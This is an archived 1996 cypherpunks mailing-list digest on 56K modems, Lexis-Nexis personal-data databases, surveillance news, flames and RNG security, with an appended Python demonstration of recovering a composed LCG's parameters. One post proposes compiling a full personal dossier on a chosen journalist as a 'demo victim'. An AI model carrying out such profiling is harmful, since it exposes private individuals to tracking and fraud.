OK, then, in each sample slot, the analog side can send one of 256 different voltages. The digital side can tell it the 8-bit values it received. Then fine-tune that to sending 128 different voltages, taking particular care around the ones that got distorted the first time. As long as you can find 128 distinct voltage levels that the central office will reliably digitize, you're done. You're sending 7-bit samples at 8000 samples/sec. Do something similar for the analog receive side, and you can start passing user data at 56K.

If the robbed-bit stuff gets in the way of seeing 128 distinct voltage levels in every byte, you can send solid zeroes or solid ones in each direction and see which bits they're stealing out of which bytes. Use most of the 8 bits available in the other bytes (you can find e.g. 200 different voltage levels that will work), and in the stolen byte, you can find e.g. 100 voltage levels that work.
This is more bits than using 128 voltage levels in every byte, and in fact you can probably get closer to 64 kbits/sec than to 56 kbits/sec, depending on the analog qualities of the wire to your central office.

A nice trick! It won't speed up analog-modem-to-analog-modem connections, but those will increasingly be a smaller and smaller fraction anyway, as the digital infrastructure becomes cheap. And of course the 56K modems will just be DSP's with decent A/D and D/A interfaces, so they can run all the old analog protocols too, in the case that the phone line isn't digitized, or if they want to talk to an old modem.

John

From bryce at digicash.com Fri Sep 20 04:28:45 1996
From: bryce at digicash.com (bryce at digicash.com)
Date: Fri, 20 Sep 1996 19:28:45 +0800
Subject: other Lexis-Nexis databases
Message-ID: <199609200804.KAA25534@digicash.com>

-----BEGIN PGP SIGNED MESSAGE-----

A brief search of www.lexis-nexis.com reveals a few interesting details:

1. You can look up people in P-TRAK by SSN.

2. There are many other databases of personal information, including:

a. "REZIDE", "searchable by congressional district, area code plus exchange, county, state, metropolitan statistical area (MSA) and dominant market area (DMA)" and "providing a detailed demographic portrait [...] including age, income, race, ethnicity, household composition, employment", a "White/Blue collar index" and a "family life-cycle code".

b. "DCEASE", giving information including SSN about dead people.

c. An assets database identifying real-estate or FAA-registered aircraft owned by people.

d. Something called "P-FIND" which is advertised as "having greater detail [than P-TRAK] with regard to the individual's household (value of home, number of dependents)". This one appears in a newsletter from 1994, so the service may be discontinued (although of course the data still exists...).

It would be a fun experiment and a good cypherpunk publicity stunt to test Lexis-Nexis out. Pick a demo victim, e.g.
a journalist who is honest, smart and concerned about such issues, but not one who is too famous or rich. Use Lexis-Nexis (and possibly other resources) to learn all that you can about him/her. If he/she lives in a sparsely-populated area a narrow enough REZIDE search might give income, number of persons in household, marital status, age, schooling, ethnicity, vehicles owned, and employment, and that would be with a single search.

Compile everything you know and send it to the victim, explaining how you got the information.

Regards,

Bryce

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMkJQCUjbHy8sKZitAQFb8AL/f2yQWv1R4QcftBF4khw0DZrd/szZqte3
UQ0HvjtAdjiVee7aLiumljMUqyMOzsXQlkWKh1/JXmbgVAVrsJGhZEFCyqbheUwP
eqhP1QEYVHfjueQy1FlSb7U3f+VI2tzk
=mky+
-----END PGP SIGNATURE-----

From hvdl at sequent.com Fri Sep 20 05:32:24 1996
From: hvdl at sequent.com (Hans Unicorn Van de Looy)
Date: Fri, 20 Sep 1996 20:32:24 +0800
Subject: (fwd) Strange telephone call
In-Reply-To: <199609192333.TAA25736@yakko.cs.wmich.edu>
Message-ID: <9609200924.AA03481@amsqnt.nl.sequent.com>

The one-and-only Damaged Justice once stated:
! >From: vandy at avana.net (Vandy Terre)
! Subject: Strange telephone call
! Date: Wed, 18 Sep 1996 14:27:05 GMT
! Organization: Tanglewood Farm
! Lines: 59
! Message-ID: <323ffe3d.188173 at news.avana.net>

[ Long story deleted ]

! This survey was supposed to be for the Department of Defense for a
! program named 'YATS'. What is YATS?

How about "Yet Another T* Survey"? You will have to fill in the T-word yourself :-)

! Any significantly advanced scam vandy at avana.net
! is indistinguishable
! from religion. Georgia, USA
!
!
! --
! frogfarm at yakko.cs.wmich.edu (Damaged Justice) is officially declared Unmutual.
! "Would I had phrases that are not known, utterances that are strange, in
! new language that has not been used, free from repetition, not an
! utterance which has grown stale, which men of old have spoken."

==== _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============
,;( )_, )~\| Hans "Unicorn" Van de Looy PGP: ED FE 42 22 95 44 25 D8
;; // `--; GSM: +31 653 261 368 BD F1 55 AA 04 12 44 54
'= ;\ = | ==== finger hvdl at sequent.com for more info ===================

From gary at systemics.com Fri Sep 20 06:19:37 1996
From: gary at systemics.com (Gary Howland)
Date: Fri, 20 Sep 1996 21:19:37 +0800
Subject: DL in exchange for fingerprint
In-Reply-To:
Message-ID: <32426E55.15FB7483@systemics.com>

Timothy C. May wrote:
>
> At 9:13 PM 9/19/96, Gary Howland wrote:
> >Timothy C. May wrote:
> >>
> >> (Yes, I disliked being thumb-printed, but I could see no viable
> >> alternative. I'm sure Duncan has some scheme to declare himself a Botswanan
> >> exchange student, but I decided being thumb-printed was the lesser hassle.)
> >
> >Sure, it's always less hassle doing what they want. Privacy doesn't
> >come for free. It's easier to let the police search you in the street
> >than it is to make them arrest you so that you can make a formal
> >complaint.
>
> So, just what it is _your_ method of dealing with this? While it is noble
> to talk about fighting the system, just how do you go about doing it
> yourself?

Use your imagination. (hint: Do all states require thumbprints for DLs?)

> (This space reserved for your lecture about how I need to be prepared to go
> to jail to defend my right not to be thumbprinted, etc. On second thought,
> why don't you be the one to go to jail, and then you can let us know your
> experiences.)

I have never seen the logic in this approach. Sure, if it's relatively easy to make a protest, then I'll do it, but going to jail out of principle is certainly more hassle for me than for "them". I would sooner demonstrate the futility of what they are trying to do, whether it be censorship or prohibition.

> >Hmm - who are you paraphrasing here? (Just curious).
>
> "What part of "No" don't you understand?"

Who said it?

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown.

pub 1024/C001D00D 1996/01/22 Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06

From gary at systemics.com Fri Sep 20 07:49:03 1996
From: gary at systemics.com (Gary Howland)
Date: Fri, 20 Sep 1996 22:49:03 +0800
Subject: 56 kbps modems
In-Reply-To: <199609200744.AAA07457@toad.com>
Message-ID: <324276F2.31DFF4F5@systemics.com>

Forwarded:

The reason for this, Newsbytes discovered after a chat with Bill Pechey, technical director with Hayes' European operations, is that the 56,000 bps modem system is actually a digital variant. Instead of the modem using an audio channel of 3,600 hertz to the exchange, the modem works across the standard copper wiring seen on most of the world's fixed wire phone systems.

In order to achieve the 56,000 bps transmission rate, the Rockwell chip-powered modem will actually physically control the codec at the telephone exchange across the copper cable.

According to Pechey, if a full 4,000 hertz were available, then an ISDN (integrated service digital network) channel of 64,000 bps would be available.

"Since the only 3,600 hertz of the audio channel is available through the codec, we reckon that the maximum transmission speed is around 56,000 bps. Furthermore, because of the high power levels required to achieve this transmission speed, the back channel will only operate at standard (analog) modem speeds," he told Newsbytes.

Pechey told Newsbytes that this back channel will support data transfers somewhere below the 28,800 bps levels, although he noted that Rockwell claims that 28,800 bps is achievable under ideal conditions.

"This means that the 56K system is best suited for Internet access, where the data is being transmitted mainly in one direction.
For applications such as videoconferencing, you'd be better off looking to ISDN for a more balanced rate," he said, noting that the main advantage of 56k technology over ISDN is the price.

"56K modem technology is cheaper than ISDN, since you don't need an ISDN system installed. It will work across the standard phone network using a standard phone socket," he said.

According to Pechey, because the technology involved is closer to conventional analog modem systems than ISDN, adding 56K transmission technology to a standard 28,800/33,600 bps modem will not be very expensive.

"Basically you'll have a black box that will work as a normal analog modem at 28,800 or 33,600 bps or whatever, but when accessing the Internet, providing the distant end of the link is a digital connection, you'll be able to use 56K in one direction, and up to 23,800 bps in the reverse direction," he said.

--
"Of course the US Constitution isn't perfect; but it's a lot better than what we have now." -- Unknown.

pub 1024/C001D00D 1996/01/22 Gary Howland
Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06

From jya at pipeline.com Fri Sep 20 09:14:51 1996
From: jya at pipeline.com (John Young)
Date: Sat, 21 Sep 1996 00:14:51 +0800
Subject: REJ_ect
Message-ID: <199609201238.MAA05068@pipe4.ny2.usa.pipeline.com>

9-20-96. NYP Page One:

"Cellular Industry Rejects U.S. Plan for Surveillance. Police Want Technology That Pinpoints Wireless Users Within a Half-Second." Markoff.

The wireless communications industry voted yesterday to reject Government-backed technology that would make it possible for law enforcement agencies to keep closer tabs on cellular phone users.

DoJ wants to be able for the first time to determine the location of a cellular phone caller within a half-second and almost instantly monitor the status of cellular-phone voice mail, conference calls and other wireless communications features.

Yesterday's vote by a subcommittee of a network operators and manufacturers group called the Telecommunications Industry Association, came in response to a technical document the F.B.I. has been quietly circulating to industry executives since April.

Known as the Electronic Surveillance Interface, the document specifies what wireless communications monitoring data must be accessible to law enforcement officials with a court warrant.

-----

http://jya.com/reject.txt (8 kb)

REJ_ect

From dlv at bwalk.dm.com Fri Sep 20 09:25:22 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 00:25:22 +0800
Subject: [NEWS] Crypto-relevant wire clippings
In-Reply-To: <19960920050709843.AAA186@GIGANTE>
Message-ID: <9iZJuD12w165w@bwalk.dm.com>

>From Adamsc at io-online.com Fri Sep 20 01:07:49 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 01:24:03 EDT for dlv
Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA09924 for dlv at bwalk.dm.com; Fri, 20 Sep 96 01:07:49 -0400
Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA186 for ; Thu, 19 Sep 1996 22:07:13 -0700
From: Adamsc at io-online.com (Adamsc)
To: "Dr.Dimitri Vulis KOTM"
Date: Thu, 19 Sep 96 22:07:34 -0800
Reply-To: "Chris Adams"
X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
X-Filtered: By PMMail 1.52 For OS/2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: Re: [NEWS] Crypto-relevant wire clippings
Message-Id: <19960920050709843.AAA186 at GIGANTE>

You are being gently flamed because.

[X] you continued a boring useless stupid thread
[ ] you repeatedly posted to the same thread that you just posted to
[x] you repeatedly initiated incoherent, flaky, and mindless threads
[x] you posted a piece riddled with profanities
[ ] you advocated Net censorship
[ ] you SCREAMED! (used all caps)
[x] you posted some sort of crap that doesn't belong in this group
[ ] you posted the inanely stupid 'Make Money Fast' article
[ ] you threatened others with physical harm
[x] you made a bigoted statement(s)
[x] you repeatedly assumed unwarranted moral or intellectual superiority
[x] you are under the misapprehension that this group is your preserve
[x] you repeatedly shown lack of humor
[x] you are apparently under compulsion to post to every threat
[?] you are posting an anonymous attack

>>> Thank you for the time you have taken to read this. Live n' Learn.<<<

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From adam at homeport.org Fri Sep 20 09:27:49 1996
From: adam at homeport.org (Adam Shostack)
Date: Sat, 21 Sep 1996 00:27:49 +0800
Subject: Cellular Industry rejects US plan for surveillance
Message-ID: <199609201419.JAA09136@homeport.org>

Front page of today's New York Times.

"But many industry executives and privacy-rights advocates disagree with the government's interpretation of the [Digital telephony] law. The industry says that the new cellular abilities would be burdensomely expensive to administer...."

http://www.nytimes.com/yr/mo/day/news/financial/cellular-phone-monitor.html

Login, of course, is cypherpunks, password cypherpunks

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From dlv at bwalk.dm.com Fri Sep 20 09:51:49 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 00:51:49 +0800
Subject: CIA hacked
In-Reply-To: <19960920051400906.AAA199@GIGANTE>
Message-ID: <0BZJuD11w165w@bwalk.dm.com>

>From Adamsc at io-online.com Fri Sep 20 01:14:30 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 01:24:05 EDT for dlv
Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10241 for dlv at bwalk.dm.com; Fri, 20 Sep 96 01:14:30 -0400
Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA199 for ; Thu, 19 Sep 1996 22:14:03 -0700
From: Adamsc at io-online.com (Adamsc)
To: "Dr.Dimitri Vulis KOTM"
Date: Thu, 19 Sep 96 22:14:25 -0800
Reply-To: "Chris Adams"
X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
X-Filtered: By PMMail 1.52 For OS/2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: Re: CIA hacked
Message-Id: <19960920051400906.AAA199 at GIGANTE>

You are being gently flamed because.

[X] you continued a boring useless stupid thread
[ ] you repeatedly posted to the same thread that you just posted to
[x] you repeatedly initiated incoherent, flaky, and mindless threads
[x] you posted a piece riddled with profanities
[ ] you advocated Net censorship
[ ] you SCREAMED! (used all caps)
[x] you posted some sort of crap that doesn't belong in this group
[ ] you posted the inanely stupid 'Make Money Fast' article
[ ] you threatened others with physical harm
[x] you made a bigoted statement(s)
[x] you repeatedly assumed unwarranted moral or intellectual superiority
[x] you are under the misapprehension that this group is your preserve
[x] you repeatedly shown lack of humor
[x] you are apparently under compulsion to post to every threat
[?] you are posting an anonymous attack

>>> Thank you for the time you have taken to read this. Live n' Learn.<<<

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From dlv at bwalk.dm.com Fri Sep 20 10:00:08 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 01:00:08 +0800
Subject: CIA hacked
In-Reply-To: <19960920051144046.AAA184@GIGANTE>
Message-ID:

>From Adamsc at io-online.com Fri Sep 20 01:12:21 1996
Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 01:24:04 EDT for dlv
Received: from [206.245.244.5] by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA10200 for dlv at bwalk.dm.com; Fri, 20 Sep 96 01:12:21 -0400
Received: from GIGANTE ([206.245.244.204]) by irc.io-online.com (post.office MTA v2.0 0813 ID# 285-17715) with SMTP id AAA184 for ; Thu, 19 Sep 1996 22:11:52 -0700
From: Adamsc at io-online.com (Adamsc)
To: "Dr.Dimitri Vulis KOTM"
Date: Thu, 19 Sep 96 22:12:08 -0800
Reply-To: "Chris Adams"
X-Mailer: Chris Adams's Registered PMMail 1.52 For OS/2
X-Filtered: By PMMail 1.52 For OS/2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Subject: Re: Re: CIA hacked
Message-Id: <19960920051144046.AAA184 at GIGANTE>

You are being gently flamed because.

[X] you continued a boring useless stupid thread
[ ] you repeatedly posted to the same thread that you just posted to
[x] you repeatedly initiated incoherent, flaky, and mindless threads
[x] you posted a piece riddled with profanities
[ ] you advocated Net censorship
[ ] you SCREAMED! (used all caps)
[x] you posted some sort of crap that doesn't belong in this group
[ ] you posted the inanely stupid 'Make Money Fast' article
[ ] you threatened others with physical harm
[x] you made a bigoted statement(s)
[x] you repeatedly assumed unwarranted moral or intellectual superiority
[x] you are under the misapprehension that this group is your preserve
[x] you repeatedly shown lack of humor
[x] you are apparently under compulsion to post to every threat
[?] you are posting an anonymous attack

>>> Thank you for the time you have taken to read this. Live n' Learn.<<<

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From pjb at ny.ubs.com Fri Sep 20 10:15:22 1996
From: pjb at ny.ubs.com (pjb at ny.ubs.com)
Date: Sat, 21 Sep 1996 01:15:22 +0800
Subject: All Bets Off
Message-ID: <199609201336.JAA09683@sherry.ny.ubs.com>

actually, i understood that he was an insurance salesman.

-paul

> From cypherpunks-errors at toad.com Fri Sep 20 06:43:59 1996
> Date: Thu, 19 Sep 1996 17:19:44 -0400 (EDT)
> From: The Deviant
> To: Daniel Christopher Miskell
> Cc: Rabid Wombat , cypherpunks at toad.com
> Subject: Re: All Bets Off
> Organization: The Silicon Pirates
> Mime-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Sender: owner-cypherpunks at toad.com
> Content-Length: 754
>
> On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote:
>
> > Date: Thu, 19 Sep 1996 11:30:32 -0400
> > From: Daniel Christopher Miskell
> > To: Rabid Wombat
> > Cc: cypherpunks at toad.com
> > Subject: Re: All Bets Off
> >
> > >On Tue, 17 Sep 1996, Jeff Davis wrote:
> > >
> > > [lots of quoting rm'd]
> > >
> > Tom Clancy is not a military-hired brain, but to make his novels realistic and
> > to do justice to the people he portrays, he does a LOT of research. He is a
> > highly respected author, and I have no doubt that his statement is based on
> > his personal findings, collected for a previous novel.
> >
>
> I believe he was also a Captain in the Navy...
>
> --Deviant
> Old MacDonald had an agricultural real estate tax abatement.
>
>
>

From wb8foz at wauug.erols.com Fri Sep 20 10:30:39 1996
From: wb8foz at wauug.erols.com (David Lesher / hated by RBOC's in 5 states)
Date: Sat, 21 Sep 1996 01:30:39 +0800
Subject: 56 kbps modems
In-Reply-To: <199609200744.AAA07457@toad.com>
Message-ID: <199609201408.KAA11269@wauug.erols.com>

John Gilmore sez:
>
>
> The rest of this is speculation and fantasy on my part.

{....}

This goes along with what others have postulated. But I have to wonder -- how long will the [re]train take? One of the gripes about PEP was that retrains were slow.... This sounds slower.

Further, how stable will the outcome be -- will the 'slop' in the CO's AD conversion overwhelm things?

Lastly, what will the RBOC's do to stifle its use?
[I take it as a given that they will object to anything that benefits subscribers and does not give them an added cut.. witness ISDN pricing, for example.] -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From bdolan at USIT.NET Fri Sep 20 10:48:14 1996 From: bdolan at USIT.NET (Brad Dolan) Date: Sat, 21 Sep 1996 01:48:14 +0800 Subject: "Confidential" medical databases Message-ID: AP, 9/19/96: Copies of a confidential computer disk containing the names of 4,000 AIDS patients were shipped anonymously to two newspapers by someone who claimed a [Florida] state health worker had been showing it on his laptop computer to friends outside a gay bar. William B. Calvert III, 35, of Treasure Island, was one of only three state Department of Health and Rehabilitative Services employees with authorized access to the confidential information. Calvert was suspended with pay Thursday as the Florida Department of Law Enforcement and HRS investigated the breach. "This is very serious. We are not aware of any breach of confidentiality of this magnitude," Jay Coburn of the AIDS Action Council in Washington, D.C. said Thursday. Nobody knows how many copies of the disk have been made, or who has them. If the allegations prove true, it could be the worst violation of AIDS confidentiality in history. [...] bd From DMiskell at envirolink.org Fri Sep 20 10:49:37 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Sat, 21 Sep 1996 01:49:37 +0800 Subject: The periodic caveat about Timmy May Message-ID: >attila writes: > >> In <199609190517.HAA00851 at basement.replay.com>, on 09/19/96 >> at 07:17 AM, nobody at flame.alias.net (Anonymous) said: >> >> = .Timmy May habitually digs into his cesspool of a mind for his >> = .mailing list fertilizer. 
>> >> this is humour. it tickles the imagination, and the reference >> to tim is lost! > >Can we get all this non-crypto-relevant shit off of this mailing list please? > >--- > >Dr.Dimitri Vulis KOTM >Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps Sorry, dear, but complaining isn't going to change it, and simple telling people to shut the fuck up is going to go nowhere. If you want solely crypto relevent material, subscribe to the filtered list. I mean, come on -- you know this list is suseptable (sp?) to noise and spam. Besides, people suggest to me that you are the anonymous mailer. So maybe you should keep a low profile on this. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From corbet at stout.atd.ucar.edu Fri Sep 20 11:05:41 1996 From: corbet at stout.atd.ucar.edu (Jonathan Corbet) Date: Sat, 21 Sep 1996 02:05:41 +0800 Subject: anonymous bacon Message-ID: <199609201506.JAA03295@atd.atd.ucar.EDU> The following, from RISKS, deserves redistribution.... Date: Tue, 17 Sep 1996 13:04:47 -0400 From: pcw at access.digex.net (Peter Wayner) Subject: Bringing Home the Anonymous Bacon The *Baltimore Sun* reports in its 17 Sep 1996 issue that people in Baltimore are paying for drugs with meat (page A1! [pretty saucy!]). Perhaps this is not yet anonymous digital cash, but certainly anonymous. [Now someone is going to propose keeping a database of all sides of beef, and steganographically watermarking the meat in the context of digitally signed scannable grade-stamps. Perhaps the next step in monitoring the private drug-meat trade would be to escrow the inspectors' private keys, derived from the product of two U.S. Primes, and put the database up on the net: the T-bone connected to the M-bone, etc.? 
PGN]

From brianh at u041.oh.vp.com Fri Sep 20 11:11:26 1996 From: brianh at u041.oh.vp.com (Brian Hills) Date: Sat, 21 Sep 1996 02:11:26 +0800 Subject: ANYONES CREDIT CARD # per your request. Message-ID:

Thought this would be appropriate to the list

Forwarded message:
> From u082.wi.vp.com!alis Fri Sep 20 10:57:39 1996
> Message-Id:
> From: alis at u082.wi.vp.com (Ali Sajanlal)
> Subject: Credit Card information (fwd)
> To: nd at u082.wi.vp.com
> Date: Fri, 20 Sep 96 9:53:03 CDT
> X-Mailer: ELM [version 2.3 PL8]
>
> Forwarded message:
> > Date: 20 Sep 96 18:38:16
> > Subject: Credit Card information
> >
> > ______________________________ Forward Header __________________________________
> > Subject: FYI - Check this out
> > Author: alis at u082.wi.vp[.com
> > Date: 9/20/96 10.00 AM
> >
> > FYI - Check this out
> >
> > Unfortunately, this message needs to be propagated to protect all of us.
> >
> > Note: Lexis-Nexis is only accepting written or fax requests. You have the
> > option to fax your removal request to (513) 865-1930 state your full name
> > and complete address. Or mail the request to:
> > Lexis-Nexis
> > Attn: P-Track
> > P.O. Box 933
> > Dayton, Ohio
> > 45401-0933
> >
> > >Subject: FYI
> > >Author: Nathan Judge at NYERPOC
> > >Date: 9/16/96 2:42 PM
> > >
> > >Your name, social security number, current address, previous addresses,
> > >mother's maiden name, birth date and other personal information are now
> > >available to anyone with a credit card through a new Lexis database called
> > >P-Trax. As I am sure you are aware, this information could be used to commit
> > >credit card fraud or otherwise allow someone else to use your identity.
> > >
> > >You can have your name and information removed from this list by making a
> > >telephone request. Call (800)543-6862, select option 4 and then option 3
> > >("all other questions") and tell the representative answering that you wish
> > >to remove your name from the P-trax database. You may also send a fax to
> > >(513) 865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton,
> > >Ohio 45401-0933. Sending physical mail to confirm your name has been removed
> > >is always a good idea.
> > >
> > >As word of the existence of this database has spread on the net, Lexis-Nexis
> > >has been inundated with calls, and has set up a special set of operators to
> > >handle the volume. In addition, Andrew Bleh (rhymes with "Play") is a
> > >manager responsible for this product, and is the person to whom complaints
> > >about the service could be directed. He can be reached at the above 800
> > >number. Ask for extension 3385. According to Lexis, the manager responsible
> > >is Bill Fister at extension 1364.
> > >
> > >Please forward this e-mail to everyone we know.
> > >
> >
> > Ali S.
> > --

--
//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\
Brian Hills Varco-Pruden Buildings 1202 Industrial Dr. Van Wert, OH 45891 419.238.9533 - brianh at u041.oh.vp.com
\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//

From burris at apdg.com Fri Sep 20 11:30:29 1996 From: burris at apdg.com (Kurt Vile) Date: Sat, 21 Sep 1996 02:30:29 +0800 Subject: DL in exchange for fingerprint In-Reply-To: Message-ID: <199609201528.KAA13170@apdg.com>

>By the way, the next rev of the California driver's license will
>reportedly have one's *Social Security Number* printed on the card!
>So much for the statement clearly printed on my card:

Illinois already has such a law, in fact you must have an SSN to even get a DL. Fortunately, the law allows a citizen-unit to choose if they want their SSN on their DL (imagine that, a choice!) - the flip side is that you have to specifically ask them not to print them - they won't ask you. One would hope that CA's law might provide a similar out...
--Kurt From jya at pipeline.com Fri Sep 20 11:59:02 1996 From: jya at pipeline.com (John Young) Date: Sat, 21 Sep 1996 02:59:02 +0800 Subject: Free E-Cash Message-ID: <199609201551.PAA22207@pipe4.ny3.usa.pipeline.com> WSJ, September 20, 1996, p. A16. Fed Chief to U.S: Back Off On Electronic-Cash Rules Washington -- Regulators should stay out of the way and let the market for electronic money develop without government meddling, said Alan Greenspan, chairman of the Federal Reserve Board. "The private sector will need the freedom to experiment without broad interference from the government," he told a government conference on electronic cash yesterday. Too much interference could impede innovation, he said. Bank debit cards, along with other forms of electronic payments, "account for a very small percentage of transactions," he said. "Even the use of popular credit cards has only recently begun to challenge paper's dominance." [End] From m5 at tivoli.com Fri Sep 20 12:21:54 1996 From: m5 at tivoli.com (Mike McNally) Date: Sat, 21 Sep 1996 03:21:54 +0800 Subject: Stego inside encryption In-Reply-To: Message-ID: <3242C142.4A37@tivoli.com> Dale Thorn wrote: > > Mullen Patrick wrote: > > To take this one step further, has anyone tried to ever use this > > method as an encryption method? You could hide data in a stream of > > random bits, using position as the encryption method. It doesn't matter *what* you do with your bits. The key thing to remember when analyzing your encryption method is that the foundation of your security rests on the difficulty of reversing the numeric sequence that drives the encryption. If I know you're using this RNG-driven steganographic message mixer, then if I can break your RNG I'm done. If I know you're scrambling bits in a file according to an RNG, if I break your RNG I'm done. The key is therefore to make the RNG cryptographically secure. 
Once you've done that, then there's questionable value in doing anything fancier than straight CBC (or something like that) to encrypt your plaintext. Note that simple functional composition of one or more simple insecure RNG's does not necessarily give you a stronger RNG (in fact it usually doesn't). Cheap RNG's like what you get from the old UNIX "rand()" are simple little linear functions, which when composed give you more simple functions. ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! From m5 at tivoli.com Fri Sep 20 12:23:01 1996 From: m5 at tivoli.com (Mike McNally) Date: Sat, 21 Sep 1996 03:23:01 +0800 Subject: CNET Digital Dispatch Vol. 2 No. 38 In-Reply-To: <3.0b19.32.19960920021220.0050fc50@gateway.grumman.com> Message-ID: <3242C2A2.4947@tivoli.com> Rick Osborne wrote: > did they mean DES or is the EDS something I'm not aware of. EDS is "Electronic Data Systems", the company Ross & a buddy started back in the late 60's/early 70's. That's where Ross made his money. EDS is a place that when Ross was in charge (and maybe still today) was a lot like what Grumman sounds like in terms of employee security issues. Armed guards patrolled the computer rooms when I was working there (1979). ______c_________________________________________________________________ Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data http://www.io.com/~m101/ * processing" are different! 
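An added illustration (not part of either post above) of the point in the "Stego inside encryption" message that composing cheap linear RNGs only gives another simple linear function: stacking two linear congruential generators yields a single LCG, and three consecutive outputs are enough to recover its parameters and predict the rest. The multipliers, increments, seed and the prime modulus are constructed for this sketch and are not the constants of any particular rand() implementation.

```python
"""Composing two LCGs gives one LCG whose parameters leak from three outputs.

All constants here are constructed for the illustration.
"""

M = 2**31 - 1  # prime modulus (assumption), so every non-zero value is invertible

# Two "cheap" generators of the form x -> (a*x + c) mod M, as (a, c) pairs.
F = (16807, 12345)
G = (48271, 54321)


def step(params, x, m=M):
    """Advance one LCG by one step."""
    a, c = params
    return (a * x + c) % m


def compose(f, g, m=M):
    """Return (a, c) of the single LCG equal to applying f and then g."""
    a1, c1 = f
    a2, c2 = g
    # g(f(x)) = a2*(a1*x + c1) + c2 = (a2*a1)*x + (a2*c1 + c2)
    return (a2 * a1) % m, (a2 * c1 + c2) % m


def stacked_stream(seed, n, m=M):
    """Outputs of the 'stronger-looking' generator: f followed by g per step."""
    out, x = [], seed
    for _ in range(n):
        x = step(G, step(F, x, m), m)
        out.append(x)
    return out


def single_stream(params, seed, n, m=M):
    """Outputs of one plain LCG with the given (a, c)."""
    out, x = [], seed
    for _ in range(n):
        x = step(params, x, m)
        out.append(x)
    return out


def recover_params(x0, x1, x2, m=M):
    """Solve x1 = a*x0 + c and x2 = a*x1 + c (mod m) for (a, c)."""
    d = (x1 - x0) % m
    if d == 0:
        # The stream is stuck on a fixed point; a carries no information here.
        raise ValueError("outputs repeat; a different triple is needed")
    a = ((x2 - x1) * pow(d, -1, m)) % m  # modular inverse, Python 3.8+
    c = (x1 - a * x0) % m
    return a, c


def predict_rest(observed, n, m=M):
    """Predict the next n outputs from the first three observed ones."""
    params = recover_params(observed[0], observed[1], observed[2], m)
    return single_stream(params, observed[2], n, m)


if __name__ == "__main__":
    seen = stacked_stream(2024, 8)
    print("composed (a, c):      ", compose(F, G))
    print("recovered from output:", recover_params(*seen[:3]))
    print("prediction matches:   ", predict_rest(seen[:3], 5) == seen[3:])
```

The same algebra is why a cryptographically secure generator is the requirement: its next output must not be computable from earlier outputs, however the bits are then used.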
